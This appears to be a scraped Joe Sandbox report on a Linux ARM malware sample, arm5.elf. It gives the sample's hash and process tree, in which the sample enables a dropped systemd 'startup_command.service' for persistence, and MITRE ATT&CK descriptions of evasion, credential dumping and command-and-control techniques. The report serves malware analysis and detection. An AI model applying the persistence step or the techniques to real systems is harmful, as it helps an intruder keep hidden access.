Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5806, Parent PID: 5488

General

Start time (UTC):	00:29:42
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5815, Parent PID: 5488

General

Start time (UTC):	00:29:51
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5818, Parent PID: 5488

General

Start time (UTC):	00:29:51
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5820, Parent PID: 5488

General

Start time (UTC):	00:29:51
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5828, Parent PID: 5488

General

Start time (UTC):	00:29:57
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5831, Parent PID: 5488

General

Start time (UTC):	00:29:57
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5490, Parent PID: 5486

General

Start time (UTC):	00:27:53
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5494, Parent PID: 5490

General

Start time (UTC):	00:27:54
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: arm5.elf PID: 5492, Parent PID: 5486

General

Start time (UTC):	00:27:53
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: sh PID: 5492, Parent PID: 5486

General

Start time (UTC):	00:27:53
Start date (UTC):	07/01/2025
Path:	/bin/sh
Arguments:	sh -c "systemctl daemon-reload"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5496, Parent PID: 5492

General

Start time (UTC):	00:27:54
Start date (UTC):	07/01/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5496, Parent PID: 5492

General

Start time (UTC):	00:27:54
Start date (UTC):	07/01/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: arm5.elf PID: 5500, Parent PID: 5486

General

Start time (UTC):	00:27:54
Start date (UTC):	07/01/2025
Path:	/tmp/arm5.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: sh PID: 5500, Parent PID: 5486

General

Start time (UTC):	00:27:54
Start date (UTC):	07/01/2025
Path:	/bin/sh
Arguments:	sh -c "systemctl enable startup_command.service"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5502, Parent PID: 5500

General

Start time (UTC):	00:27:54
Start date (UTC):	07/01/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5502, Parent PID: 5500

General

Start time (UTC):	00:27:54
Start date (UTC):	07/01/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl enable startup_command.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: systemd PID: 5498, Parent PID: 5497

General

Start time (UTC):	00:27:54
Start date (UTC):	07/01/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5498, Parent PID: 5497

General

Start time (UTC):	00:27:54
Start date (UTC):	07/01/2025
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 5504, Parent PID: 5503

General

Start time (UTC):	00:27:55
Start date (UTC):	07/01/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5504, Parent PID: 5503

General

Start time (UTC):	00:27:55
Start date (UTC):	07/01/2025
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: gnome-session-binary PID: 5526, Parent PID: 1588

General

Start time (UTC):	00:27:56
Start date (UTC):	07/01/2025
Path:	/usr/libexec/gnome-session-binary
Arguments:	-
File size:	334664 bytes
MD5 hash:	d9b90be4f7db60cb3c2d3da6a1d31bfb

Chronological Activities

Analysis Process: sh PID: 5526, Parent PID: 1588

General

Start time (UTC):	00:27:56
Start date (UTC):	07/01/2025
Path:	/bin/sh
Arguments:	/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: gsd-rfkill PID: 5526, Parent PID: 1588

General

Start time (UTC):	00:27:56
Start date (UTC):	07/01/2025
Path:	/usr/libexec/gsd-rfkill
Arguments:	/usr/libexec/gsd-rfkill
File size:	51808 bytes
MD5 hash:	88a16a3c0aba1759358c06215ecfb5cc

Chronological Activities

Analysis Process: gdm3 PID: 5533, Parent PID: 1400

General

Start time (UTC):	00:27:57
Start date (UTC):	07/01/2025
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Chronological Activities

Analysis Process: Default PID: 5533, Parent PID: 1400

General

Start time (UTC):	00:27:57
Start date (UTC):	07/01/2025
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: gdm3 PID: 5534, Parent PID: 1400

General

Start time (UTC):	00:27:57
Start date (UTC):	07/01/2025
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Chronological Activities

Analysis Process: Default PID: 5534, Parent PID: 1400

General

Start time (UTC):	00:27:57
Start date (UTC):	07/01/2025
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemd PID: 5568, Parent PID: 1

General

Start time (UTC):	00:28:07
Start date (UTC):	07/01/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: systemd-user-runtime-dir PID: 5568, Parent PID: 1

General

Start time (UTC):	00:28:07
Start date (UTC):	07/01/2025
Path:	/lib/systemd/systemd-user-runtime-dir
Arguments:	/lib/systemd/systemd-user-runtime-dir stop 127
File size:	22672 bytes
MD5 hash:	d55f4b0847f88131dbcfb07435178e54

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, User Account: User Account Deletion, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, Google Workspace, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report arm5.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/systemd/system/startup_command.service

/memfd:snapd-env-generator (deleted)

/tmp/qemu-open.uRTK8R (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: arm5.elf PID: 5484, Parent PID: 5402

General

Chronological Activities

Analysis Process: arm5.elf PID: 5486, Parent PID: 5484

General

Chronological Activities

Analysis Process: arm5.elf PID: 5488, Parent PID: 5486

General

Chronological Activities

Analysis Process: arm5.elf PID: 5535, Parent PID: 5488

General

Chronological Activities

Analysis Process: arm5.elf PID: 5537, Parent PID: 5488

General

Chronological Activities

Analysis Process: arm5.elf PID: 5539, Parent PID: 5488

Linux Analysis Report
arm5.elf